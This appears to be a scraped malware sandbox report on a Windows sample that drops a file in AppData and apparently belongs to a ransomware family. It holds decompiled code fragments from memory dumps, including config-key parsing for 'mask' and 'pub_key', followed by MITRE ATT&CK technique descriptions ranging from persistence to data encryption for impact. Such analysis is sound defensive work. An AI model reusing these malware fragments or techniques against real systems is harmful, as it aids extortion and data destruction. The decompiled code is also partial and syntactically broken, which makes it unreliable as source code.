				_t29 = _a4;
				_v8 = __edx;
				_t51 = __ecx;
				asm("movq [ebp-0x10], xmm0");
				_v12 = _t16;
				if( *_t29 == 0) {
					L11:
					if(_t51 == 0) {
						goto L10;
					} else {
						if(_v20 == 0) {
							L22:
							if(_t51 == 0) {
								goto L10;
							} else {
								_t53 = _t51 + lstrlenA( &_v20);
								while(1) {
									_t20 =  *_t53;
									if(_t20 >= 0x30 && _t20 <= 0x39) {
										break;
									}
									_t53 =  &(_t53[1]);
								}
								_t33 = _t53;
								while(1) {
									_t21 =  *_t33;
									if(_t21 < 0x30 || _t21 > 0x39) {
										goto L30;
									}
									L31:
									_t33 =  &(_t33[1]);
									continue;
									L30:
									if(_t21 == 0x2e) {
										goto L31;
									}
									 *_t33 = 0;
									return lstrcpyA(_v8, _t53);
									goto L33;
								}
							}
						} else {
							_t34 =  *_t51;
							if(_t34 != 0) {
								_t47 = _t51 -  &_v20;
								do {
									_t24 =  &_v20;
									if(_t34 == 0) {
										L19:
										if( *_t24 == 0) {
											goto L22;
										} else {
											goto L20;
										}
									} else {
										while(1) {
											_t35 =  *_t24;
											if(_t35 == 0) {
												goto L22;
											}
											_t41 =  *((char*)(_t47 + _t24)) - _t35;
											if(_t41 != 0) {
												goto L19;
											} else {
												_t24 = _t24 + 1;
												if( *((intOrPtr*)(_t47 + _t24)) != _t41) {
													continue;
												} else {
													goto L19;
												}
											}
											goto L33;
										}
										goto L22;
									}
									goto L33;
									L20:
									_t34 =  *((intOrPtr*)(_t51 + 1));
									_t51 = _t51 + 1;
									_t47 = _t47 + 1;
								} while (_t34 != 0);
							}
							goto L10;
						}
					}
				} else {
					_t25 =  *__ecx;
					if(_t25 == 0) {
						L10:
						return lstrcpyA(_v8, "fabian wosar <3");
					} else {
						_t49 = __ecx - _t29;
						do {
							_t42 = _t29;
							if(_t25 == 0) {
								L8:
								if( *_t42 == 0) {
									goto L11;
								} else {
									goto L9;
								}
							} else {
								while(1) {
									_t26 =  *_t42;
									if(_t26 == 0) {
										goto L11;
									}
									_t38 =  *((char*)(_t49 + _t42)) - _t26;
									if(_t38 != 0) {
										goto L8;
									} else {
										_t42 = _t42 + 1;
										if( *((intOrPtr*)(_t49 + _t42)) != _t38) {
											continue;
										} else {
											goto L8;
										}
									}
									goto L33;
								}
								goto L11;
							}
							goto L33;
							L9:
							_t25 =  *((intOrPtr*)(_t51 + 1));
							_t51 = _t51 + 1;
							_t49 = _t49 + 1;
						} while (_t25 != 0);
						goto L10;
					}
				}
				L33:
			}

APIs

lstrcpyA.KERNEL32(?,fabian wosar <3,?,0F5851ED), ref: 0F584F0D
lstrlenA.KERNEL32(00000000,?,0F5851ED), ref: 0F584F67
lstrcpyA.KERNEL32(?,?,?,0F5851ED), ref: 0F584F98

Strings

fabian wosar <3, xrefs: 0F584F05

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID: fabian wosar <3
API String ID: 367037083-1724090804
Opcode ID: ee5f67d4a8da7a1e21080e4d8712276d4c58a5ef008175b37af3526b31fee9ae
Instruction ID: d9b35829451fd4d31406d3ed64547f20581a92da1a4b9f184b729a44e9cba122
Opcode Fuzzy Hash: ee5f67d4a8da7a1e21080e4d8712276d4c58a5ef008175b37af3526b31fee9ae
Instruction Fuzzy Hash: 493103218082A75ADB22EE2854503FABFA1BF43211F9851EDDCD5BB307D3615447C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 0F583190 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 42
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F583190(CHAR* _a4) {
				char _t6;
				CHAR* _t13;
				CHAR* _t16;

				_t13 = _a4;
				_t16 = _t13;
				if( *_t13 == 0) {
					L5:
					lstrcmpiA(_t13, "mask");
					_t10 =  ==  ? 1 : 0;
					lstrcmpiA(_a4, "pub_key");
					 *_t16 = 0x3d;
					_t11 =  ==  ? 2 :  ==  ? 1 : 0;
					_t5 =  ==  ? 2 :  ==  ? 1 : 0;
					return  ==  ? 2 :  ==  ? 1 : 0;
				} else {
					while(1) {
						_t6 =  *_t16;
						if(_t6 == 0x7d) {
							break;
						}
						if(_t6 == 0x3d) {
							 *_t16 = 0;
							goto L5;
						} else {
							_t16 =  &(_t16[1]);
							if( *_t16 != 0) {
								continue;
							} else {
								goto L5;
							}
						}
						goto L8;
					}
					return 0;
				}
				L8:
			}

APIs

lstrcmpiA.KERNEL32(0F585444,mask,0F585445,?,?,0F583441,0F585445,00000000,00000000,00000000,?,?,0F585444,00000000), ref: 0F5831B9
lstrcmpiA.KERNEL32(0F585444,pub_key,?,0F583441,0F585445,00000000,00000000,00000000,?,?,0F585444,00000000), ref: 0F5831D1

Strings

pub_key, xrefs: 0F5831BF
mask, xrefs: 0F5831B1

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: mask$pub_key
API String ID: 1586166983-1355590148
Opcode ID: 74e08ff8f6eb92781eca81078024d7b71b36a7e29bfee0a36dc9fac493765134
Instruction ID: 85da7ed5d81de2fe1a2b3a3d45e16c5e199c81a0ecb1df7bb91ee0197f6ee925
Opcode Fuzzy Hash: 74e08ff8f6eb92781eca81078024d7b71b36a7e29bfee0a36dc9fac493765134
Instruction Fuzzy Hash: 66F046723082845EF7155A689C457E1BFC8AB45F10F94047FE6CAE6242C2AA98838350

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN , ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report IJr8RvvhZ3.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Network Behavior

Network Port Distribution

UDP Packets

Windows Analysis Report
IJr8RvvhZ3.exe

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre